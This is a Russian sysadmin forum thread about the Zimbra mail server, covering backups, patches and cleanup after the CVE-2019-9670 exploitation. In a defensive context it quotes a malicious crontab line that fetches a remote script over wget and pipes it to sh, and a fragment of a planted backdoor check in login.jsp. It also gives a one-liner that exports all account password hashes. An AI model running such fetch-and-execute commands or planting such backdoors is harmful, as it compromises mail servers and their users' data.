Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » В помощь системному администратору » Активные темы » Zimbra

Модерирует : lynx, Crash_Master, dg, emx, ShriEkeR

 Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

Открыть новую тему     Написать ответ в эту тему

revenger_zv



Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Тема в варезнике


Read The Fucking Manual


Zimbra Collaboration Suite (ZCS) — программный продукт, который позиционируется как альтернатива MS Exchange. Клиентская часть системы сделана в стиле Ajax.
Преимущества:
• Разработан с использованием Open Source (Linux, Apache Tomcat, Postfix MTA, MySQL, OpenLDAP и т.д.).
• Имеется бесплатная версия.
• Свой почтовый клиент Zimbra Desktop, который позволяет юзерам совместно пользоваться календарем, документооборотом, почтой контактами и т.д. Есть версии под MacOs, Windows, Linux.
• Имеет мощную систему плагинов Zimlet. Плагины разрабатываются официально, а так же самими пользователями.
• Web версия клиента.
• Интеграция с Active Directory.
• Встроенные антивирусная\антиспам защита.
...


Важно!

Zimbra 8.8.15 will be reaching its end-of-life (EOL) on December 31 2023
while Zimbra 9.0.0 reaches its EOL on March 31 2024.

 
Резервирование
немаловажная тема резервирования данных почтового сервера (ссылки на статьи с скриптами)
резервирование почтовых ящиков - владелец сайта зажал инфу, запаролил доступ. (slaj)
резервирование списков рассылки
 
резервирование кэша паролей одной командой (где взял уже не помню)

Код:
for i in `zmprov -l gaa | egrep -v 'avir|galsync|spam|ham|virus'`; do echo "zmprov ma $i userPassword `zmprov -l ga $i userPassword | grep userPassword | sed 's/userPassword: //'`"; done;

 
LetsEncrypt for zimbra
Installing a Let's Encrypt SSL Certificate Last updated on 2022-07-01
Mirror 9.0.0 (Кому надо потом меняем на х ttps://files.zimbra.com/downloads.... оригинальный источник)  
 
Установка темы Zimbra от Zextras
 
Немного информации про некоторые настройки спам фильтров и не только, может кому пригодится - ссылка
 
Configuring High-Fidelity Document Preview

Всего записей: 7 | Зарегистр. 16-01-2007 | Отправлено: 11:39 17-09-2007 | Исправлено: sasha2002, 22:29 11-02-2024
sasha2002



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
panther ra
http://imapsync.lamiral.info/

Всего записей: 555 | Зарегистр. 15-11-2006 | Отправлено: 13:03 21-05-2019
stanzdor81



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
у кого проблема со входом в почту через аякс
решение:
Устраните поразившие ваш сервер эксплоиты, воспользовавшись статьей:
https://lorenzo.mile.si/zimbra-cve-2019-9670-being-actively-exploited-how-to-clean-the-zmcat-infection/961/
 
Установите патч последний для своей версии со страницы https://www.zimbra.com/downloads/zimbra-collaboration/
Если для вашей версии нет, то обновитесь до версии для которой есть патч, устраняющий уязвимости CWE-918 / CWE-807
 
Устаревшая инструкция:
под root:
cd /opt/zimbra/mailboxd
find webapps -type d -exec chmod 0755 {} \;
find webapps -type f -exec chmod 0644 {} \;
 
Затем перезагружаем зимбру:
su - zimbra
zmcontrol restart
 
Также проверьте права на папку /opt/zimbra/data/tmp/upload
должны быть 750 иначе не будут прикрепляться вложения
 

Всего записей: 173 | Зарегистр. 24-02-2007 | Отправлено: 10:25 27-05-2019 | Исправлено: stanzdor81, 12:09 29-05-2019
BW4ever

Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
В дополнение к предыдущему посту, мне на версии 8.7.1 не помогло, пока не почистил куки в браузере.

Всего записей: 265 | Зарегистр. 18-05-2006 | Отправлено: 11:36 27-05-2019
dasVelit



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
stanzdor81
Как пишут патчи ничего не решают.
 
Проверяйте еще крон crontab -e -u zimbra
В самом файле не должно быть zmwatch.sh и  
* * * * * wget -q -O - http://93.113.108.146:443/cr.sh | sh > /dev/null 2>&1
 
Сейчас ip заблокированы но все равно.
 
По поводу вложений,
но нужно еще  
 
chmod 755 /opt/zimbra/data/tmp/
chmod 755 /opt/zimbra/data/tmp/upload/
 
Иначе нельзя будет пересылать файлы с вложениями
 
Есть еще рекомендации https://lorenzo.mile.si/zimbra-cve-2019-9670-being-actively-exploited-how-to-clean-the-zmcat-infection/961/
 
И да, у меня ничего не нашлось, но каждую ночь слетают права. С чем связно не понятно.
 
И да, связано это с эксплуатацией CVE-2019-9670 exploited

Всего записей: 60 | Зарегистр. 16-02-2007 | Отправлено: 09:56 29-05-2019 | Исправлено: dasVelit, 10:35 29-05-2019
BW4ever

Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
dasVelit мне обновление с 8.7.1 до 8.7.11 и патч помогли. Права не слетают. А, еще в shadow нашел пароль у root, удалил на всякий случай, и на своей учетке поменял.

Всего записей: 265 | Зарегистр. 18-05-2006 | Отправлено: 10:25 29-05-2019
dasVelit



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
BW4ever
 
Я в /var/tmp нашел /var/tmp/tmp.txt пустой.
 
У меня странная вообще ситуация, вроде все говорит что кто то использовал эксплоит, но при этом нет самого эксплоита и вообще каких либо файлов говорящих что он был. То есть часть признаков есть, часть нет.

Всего записей: 60 | Зарегистр. 16-02-2007 | Отправлено: 10:53 29-05-2019
AkeHayc

Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Капец, почтарь работает хорошо, и тут на тебе))), уязвимость...
Прошурудил задания cron и проверил есть ли файл txt. Ничего такого не нашел на Zimbra 8.8.10.
И веб интерфейс нормально работает.
 
Сейчас обновляю, а то чем черт не шутит.

Всего записей: 519 | Зарегистр. 24-02-2009 | Отправлено: 19:27 29-05-2019 | Исправлено: AkeHayc, 19:29 29-05-2019
BW4ever

Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Сегодня на 8.7.11 права на webapps опять слетели. В кроне пусто, в shadow изменений нет, в процессах zmswatch.sh тоже нет... Мистика какая то...

Всего записей: 265 | Зарегистр. 18-05-2006 | Отправлено: 10:58 03-06-2019
sasha2002



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
BW4ever
Patch-11 has been issued on 15 April 2019
Установлен?
rkhunter провертесь

Всего записей: 555 | Зарегистр. 15-11-2006 | Отправлено: 11:15 03-06-2019
stanzdor81



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
BW4ever
там помимо всего прочего вся эта хрень прописывается в файлах вебинтерфейса - поэтому при обычном заходе на почту права и слетают - надо восстанавливать файлы  
Вот эти команды покажут инфицированные файлы:
grep -R '(request.getParameter.' /opt/zimbra/mailboxd
grep -R '(request.getParameter.' /opt/zimbra/jetty
Инструкция по лечению :
#
 
или переустановить сервер и перенести данные по инструкции  Rebuild ZCS Server

Всего записей: 173 | Зарегистр. 24-02-2007 | Отправлено: 15:23 03-06-2019 | Исправлено: stanzdor81, 08:46 07-06-2019
dasVelit



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Вообщем тело полетело.
 
Чекайте /opt/zimbra/jetty/webapps/zimbra/public/login.jsp
Если в конце найдете что то типа
 
<%  if (   "qa3-dVb1ZfMAFlQqBtvr7Yj7sI7UwsgWsssfqiMEx5U".equals(request.getParame
 
Редактируйте аккуратно или замените из оригинально дистра
 
Ищите везде где есть эта строка qa3-dVb1ZfMAFlQqBtvr7Yj7sI7UwsgWsssfqiMEx5U
 
 
И да, советую периодически делать
 
find /opt/zimbra/jetty/ -name "*" -mtime -5 -ls
 
Будет видно что меняется
 

Всего записей: 60 | Зарегистр. 16-02-2007 | Отправлено: 14:17 24-06-2019 | Исправлено: dasVelit, 16:48 24-06-2019
xvasekx

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Всем привет, сбойнул сервер с zimbra.  
Release 8.8.12.  
Не пускает в админку, пустая страница из любого браузера. В веб ошибка сети при авторизации пользователя. По pop и imap тоже не подключается.  
Перезапускал все службы, службы все загружены.
в логах ошибка com.zimbra.common.service.ServiceException: error while proxying request to target server: HTTP/1.1 503 Service Unavailable.
Помогите запустить сервер.

Всего записей: 26 | Зарегистр. 02-04-2010 | Отправлено: 15:19 30-07-2019
ipmanyak



Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
xvasekx Почитай тут
https://wiki.zimbra.com/wiki/DoSFilter
https://wiki.zimbra.com/index.php?title=Network_Service_Error_has_occurred
https://wiki.zimbra.com/wiki/Zimbra_Proxy_Manual:Troubleshooting_Zimbra_Proxy
 


----------
В сортире лучше быть юзером, чем админом...

Всего записей: 11724 | Зарегистр. 10-12-2003 | Отправлено: 15:36 30-07-2019
xvasekx

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
ipmanyak
Спасибо за ссылки. По dosfilter пробовал уже. Самое интересное что не какие изменения через zmprov внести не удается все та же ошибка.  
ERROR: service.PROXY_ERROR (error while proxying request to target server: HTTP/1.1 503 Service Unavailable)

Всего записей: 26 | Зарегистр. 02-04-2010 | Отправлено: 09:02 31-07-2019
AkeHayc

Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
А у меня почему-то в новой версии 8.8.12 поламалась статистика по количеству входящих и исходящих сообщений.
Раньше показывало примерно по отчету в день 2000 входящих, 1500 исходящих.
 
Сейчас цифры возросли в 20 раз.
Например за вчера:
   6601   received  
  35657   delivered
 
За позавчера:  
   7153   received
  39832   delivered
 
Все работает, вот думаю забить на эту фигню.
Это стало после обновления, в черные списки что странно не попадаем, очередь пустая.
Стоит ограничение на отправку...
 

Всего записей: 519 | Зарегистр. 24-02-2009 | Отправлено: 15:19 08-08-2019 | Исправлено: AkeHayc, 18:09 09-08-2019
Atmel

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Архивация скриптом zmmailbox -z -m $MailBox ... (где $MailBox - список учетных записей пользователей) ... и восстановление проходит успешно, однако в восстановленных ящиках нет прежнего пароля.
Версия дистрибутива zcs-8.8.15_GA_3847.UBUNTU18_64.20190823100304
Что не так в процедуре сохранения?

Всего записей: 127 | Зарегистр. 10-04-2012 | Отправлено: 08:14 19-11-2019
sasha2002



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
39832   delivered

AkeHayc
Я бы проверил кто столько шлёт, вашими акками кто-то пользуется, и слава богу что в чёрный список ещё не попали.

Всего записей: 555 | Зарегистр. 15-11-2006 | Отправлено: 11:06 26-11-2019
Atmel

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Сегодня один пользователь раз шесть обращался с просьбой его разблокировать. Работает в сессии на терминальном сервере в веб-клиенте (пользуемся из за того, что приложение не слишком удобно и нужно ещё делиться общим списком контактов). Адрес терминального сервера  в лок.сети 192.168.0.5
 
В логе обнаруживаю  
 
 
2019-11-28 10:37:25,362 INFO  [qtp1712669532-12096:http://mail.z.ru/service/soap/NoOpRequest] [] misc - Access from IP 192.168.0.5 suspended, for repeated failed login.
2019-11-28 10:39:25,204 INFO  [qtp1712669532-12365:http://mail.z.ru/service/soap/NoOpRequest] [name=serova@z.ru;mid=61;oip=192.168.0.169;ua=Mozilla/5.0 (Windows NT 6.1;; rv:58.0) Gecko/20100101 Firefox/58.0;] misc - Access from IP 192.168.0.5 suspended, for repeated failed login.
 
И вот почему-то строки лога этого пользователя, у которого таких записей несколько за день, не сообщает, чей аккаунт "suspended", а у Серовой (она пыталась зайти со своего персонального ПК 192.168.0.169) написано. И почему не написано у этого пользователя?
Успешные входы в /log/activity.log у него зафиксированы с указанием имени аккаунта.
И вообще, я не понял, откуда все таки  заходила Серова - с 192.168.0.169 или с 192.168.0.5 (т.е. терминала)?

Всего записей: 127 | Зарегистр. 10-04-2012 | Отправлено: 20:03 28-11-2019 | Исправлено: Atmel, 20:07 28-11-2019
sasha2002



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Atmel
/var/log/zimbra.log  
/var/log/mail.log
 
тебе в помощь
 
НУ а если по логу что ты скинул то там указанно что заблокировали доступ для 192.168.0.5 (Access from IP 192.168.0.5 suspended, for repeated failed login) из-за того что вводил кто-то неправильно и упорно пароль.  
Позже она уже пыталась зайти с терминала и её заблокировали так как заблочен айпишник терминала, а её реальный IP(oip=192.168.0.169).
Глянь строчки выше чуть этой "2019-11-28 10:37:25,362 INFO", у зимбры есть неприятный баг не совсем правильно писать логи по очереди.

Всего записей: 555 | Зарегистр. 15-11-2006 | Отправлено: 08:14 29-11-2019
Atmel

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Дело в том, что Серова в терминале не работает, и даже учётки нет . Он даже в домен не входит. А тут отправитель - ip компьютера Серовой, а блокировка в той же строке - ip терминала. Кроме того, Серова не была блокирована.

Всего записей: 127 | Зарегистр. 10-04-2012 | Отправлено: 18:18 29-11-2019 | Исправлено: Atmel, 18:48 29-11-2019
Открыть новую тему     Написать ответ в эту тему

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

Компьютерный форум Ru.Board » Компьютеры » В помощь системному администратору » Активные темы » Zimbra


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru